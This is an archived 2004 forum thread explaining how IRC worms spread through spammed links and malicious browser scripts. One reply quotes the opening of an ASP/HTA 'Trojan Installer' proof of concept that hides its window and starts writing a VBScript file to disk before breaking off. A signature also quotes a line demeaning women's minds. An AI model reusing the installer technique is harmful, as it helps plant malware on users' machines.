|
-
January 9th, 2004, 05:23 AM
#1
"IRC" virii?
Chances are, if you are a user of a large IRC network (such as DAL and EFnet), you will know what im talking about.
Usually a user spams a website (eg: <sexc69> *** see me on webcam @ http://www.geocities.com/infected_site) to other users. The users, not knowing any better, click on the link and are infected -- they start spreading the link as well, usually without their knowledge.
Although i have had contact with these things for quite a while, i have never actually "lived on the edge" and visited the spammed websites. I was wondering then, exactly *how* does the client (usually mIRC) get infected through a simple click? Or have i missed something?
Regards
-
January 9th, 2004, 05:35 AM
#2
Most likely the site contains malicious code such as Java/JavaScript to attack the computer and get the virus onto the system. It can then join irc servers and propagate itself in the very same fashion. A rather unexperienced user wouldnt really notice it, unless they had a firewall and could see the IRC traffic to servers they dont normally use. Another downside to these virii is that they can be designed to create a network for a DDoS attack, so not only has your computer become infected with a virus, but its now being used to attack someone else and you get left holding the short end of the stick.
You're not your post count, You're not your avatar or sig, You're not how fast your internet connection is, You are not your processor, hard drive, or graphics card. You're the all-singing, all-dancing crap of AO
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
-
January 9th, 2004, 05:57 AM
#3
Thanks,
I thought that it might have something to do with Java/Javascript, but as i have never 'played' with it, i wouldnt know. Are there any effective ways to block malicious Java code (without disabling Javascript in the browser?)
-
January 9th, 2004, 06:19 AM
#4
they're constantly making patches to block malicious javas scripts but new malicious scripts are written almost as fast which exploit new holes found in browser security which lately come out even faster.
if you plan to surf sites you dont know disable java scripts
Here's part of a malicious page that uses asp:
<%
' Trojan Installer Written By Ethics
' Simple exploit of the Object tag
' Just put this file as the "data" value in an object tag
'-----------------------------------------------
' make sure Nothing has gone to the client
response.clear
response.contenttype="application/hta"
%>
<HTML>
<HEAD>
<TITLE></TITLE>
<HTA:APPLICATION ID="PsyBot"
APPLICATIONNAME="PsyBotInstaller"
BORDER="none"
BORDERSTYLE="normal"
CAPTION="no"
ICON=""
CONTEXTMENU="no"
MAXIMIZEBUTTON="yes"
MINIMIZEBUTTON="yes"
SHOWINTASKBAR="no"
SINGLEINSTANCE="no"
SYSMENU="no"
VERSION="1.0"
WINDOWSTATE="minimize"/>
<SCRIPT LANGUAGE="VBScript">
MyFile = "c:\me.vbs"
Set FSO = CreateObject("Scripting.FileSystemObject")
...and the rest of the code
even though its published as a 'proof of concept' (PoC) it can still do a lot of damage
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
-
January 9th, 2004, 06:46 AM
#5
Thanks for the example and information, Tedob1/Syni666
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote